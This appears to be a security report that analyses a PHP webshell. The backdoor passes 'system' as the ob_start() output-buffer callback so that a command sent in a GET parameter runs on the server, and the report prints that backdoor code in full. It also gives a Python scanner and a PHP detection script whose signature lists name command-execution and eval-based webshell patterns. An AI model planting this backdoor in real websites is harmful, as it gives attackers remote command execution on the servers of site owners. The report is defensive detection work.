PHP ob_start() Function Backdoor Analysis Report

Source: Internet
Author: User

Recently, according to analysis data from the log analysis platform, the access logs of some websites contain a large number of requests showing command-execution backdoor behavior.

After getting in touch with the affected user we obtained the code of the backdoor file. This type of backdoor is triggered through PHP's ob_start() function: the output-buffer callback mechanism of ob_start() is used to invoke a command execution function, and the content of the output buffer, which carries the command sent remotely by the attacker, becomes that function's argument. Because the command execution function is named only as a callback rather than called directly, the code avoids the keywords that common backdoor scanning and removal tools look for, and in the end the attacker executes arbitrary commands with the privileges of the web server.

The PHP manual describes the callback mechanism of the ob_start() function as follows:

The ob_start() function backdoor code is as follows:

<?php
$cmd = 'system';   # the callback is passed by name, so the string "system(" never appears in the file
ob_start($cmd);    # everything echoed from here on is handed to system() when the buffer is flushed
echo "$_GET[a]";   # the attacker's command arrives in the "a" query parameter
ob_end_flush();    # flushing the buffer runs the callback, i.e. system($_GET['a'])
?>

Backdoor exploitation effects include:

For this type of backdoor behavior, webmasters are advised to check whether ob_start() is called anywhere in the website's source code and, where it is, whether its parameter is a common command execution function (system, exec, popen, shell_exec, etc.) or another suspicious callback. As the sample above shows, the callback may be passed indirectly through a variable, so the function name will not necessarily appear next to the ob_start() call.
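To make that check concrete, here is an added Python scanner (not part of the original report) that resolves the simple $var = 'name'; indirection used by this backdoor and flags ob_start() calls whose callback is one of the command-execution functions listed above; the two PHP samples it scans are constructed for the example.

```python
import re

# Command-execution functions the report names as suspicious ob_start() callbacks.
DANGEROUS_CALLBACKS = {"system", "exec", "popen", "shell_exec", "passthru", "proc_open"}

# A plain string assignment such as:  $cmd = 'system';
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(['\"])([A-Za-z_]\w*)\2\s*;")
# An ob_start() call and its first argument: ob_start($cmd) or ob_start('system')
OBSTART_RE = re.compile(r"\bob_start\s*\(\s*(\$\w+|['\"][A-Za-z_]\w*['\"])\s*[,)]", re.I)


def find_obstart_backdoors(source):
    """Return [(line_number, callback_name)] for every ob_start() whose callback
    resolves to a command-execution function. Only literal string assignments
    are resolved, which is enough for the indirection used by the backdoor above."""
    assigned = {name: value for name, _, value in ASSIGN_RE.findall(source)}
    hits = []
    for match in OBSTART_RE.finditer(source):
        arg = match.group(1)
        # $cmd -> look up its literal value; 'system' -> use the literal directly
        callback = assigned.get(arg[1:]) if arg.startswith("$") else arg.strip("'\"")
        if callback and callback.lower() in DANGEROUS_CALLBACKS:
            line = source.count("\n", 0, match.start()) + 1
            hits.append((line, callback.lower()))
    return hits


# Constructed samples: the backdoor from the report and a benign output-buffer user.
BACKDOOR_SAMPLE = """<?php
$cmd = 'system'; ob_start($cmd); echo "$_GET[a]"; ob_end_flush();
?>"""

BENIGN_SAMPLE = """<?php
function compress_page($buf) { return gzencode($buf); }
ob_start('ob_gzhandler');
ob_start("compress_page");
?>"""

if __name__ == "__main__":
    for name, sample in (("backdoor", BACKDOOR_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, find_obstart_backdoors(sample))
```

Run it over the contents of each .php file under the web root; a hit reports the line and the resolved callback, while ordinary buffer handlers such as ob_gzhandler are ignored.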

To make it easier for webmasters to check website source code for suspicious webshell programs or dangerous function calls, the log security team has written a simple PHP webshell detection script with which webmasters can quickly and conveniently check whether malicious backdoor code has been inserted into website files. The source code and usage are as follows:

#!/usr/bin/php -q
<?php
# Simple PHP webshell detection script - by the log security team
# Detection signatures:
#   eval\(\$_POST        matches eval($_POST[cmd]) -- classic PHP webshell code
#   system(), exec(), shell_exec(), popen(), passthru(), proc_open()
#                        can execute system commands; matched by name and call syntax
#   phpinfo()            appears frequently in the PHPSPY trojan; in normal files it may also expose sensitive information
#   eval\(base64         matches base64-encoded backdoors
#   eval\(gzuncompress   matches gzip-compressed backdoors
#   '*'                  matches one-line backdoors similar to '$_REQUEST[cmd]'
#   other dangerous functions that can remotely execute commands or directly write backdoor files
#                        (dl, assert, error_log, ob_start, preg_replace with the /e modifier)
# Usage: ./findshell.php /home/wwwroot/ (enter the web directory path here) > result.log

set_time_limit(0);

# Patterns checked against every line of every PHP file (case-insensitive).
# The original script used eregi(), which was removed in PHP 7; preg_match() is used instead.
$patterns = array(
    '#eval\(\$_POST#i',
    '#system\(#i',
    '#exec\(#i',
    '#shell_exec\(#i',
    '#popen\(#i',
    '#phpinfo\(#i',
    '#passthru\(#i',
    '#proc_open\(#i',
    '#phpspy#i',
    '#eval\(base64#i',
    '#eval\(gzuncompress#i',
    '#preg_replace\(["\']/\^/e#i',   # preg_replace("/^/e", ...): the /e modifier evaluates the replacement
    '#assert\(#i',
    '#ob_start\(#i',
    '#error_log\(#i',
    '#dl\(#i',
);

# Recursively walk $directory and report every PHP file line that matches a pattern.
function find($directory, $patterns) {
    $mydir = dir($directory);
    while (($file = $mydir->read()) !== false) {
        if ($file == "." || $file == "..") {
            continue;
        }
        if (is_dir("$directory/$file")) {
            find("$directory/$file", $patterns);
        } elseif (preg_match('#\.php#i', $file)) {
            $fd = realpath($directory . "/" . $file);
            $fp = fopen($fd, "r");
            $i = 0;
            while (($buffer = fgets($fp, 4096)) !== false) {
                $i++;
                foreach ($patterns as $pattern) {
                    if (preg_match($pattern, $buffer)) {
                        all();
                        echo "Suspicious File Path: " . $fd . "\r\nLine " . $i . ": " . $buffer . "\r\n";
                        break;   # one report per line, as in the original or-chain
                    }
                }
            }
            fclose($fp);
        }
    }
    $mydir->close();
}

# Prints a running count of the suspicious lines found.
function all() {
    static $count = 1;
    echo $count;
    $count++;
}

find($argv[1], $patterns);
?>

The analysis results of the program are saved in the result.log file in the current directory.

Logstore can find the suspicious access behavior of most common web backdoors by analyzing logs. However, because PHP syntax is loose, some backdoor behavior can be implemented with ordinary functions (executing system commands through a callback, as in the sample above), so both missed detections and false positives are possible. During website development, developers need a certain degree of secure programming awareness: pay attention to variable initialization and similar logic problems, and add security filtering functions and other preventive measures, so that, starting from the security of the website's own code, defense in depth can be achieved. We hope that webmasters can learn more about web security through the security knowledge and skills shared by Log service and make their websites run more stably and securely.

Note: This security report is from the official website www.rizhibao.com.
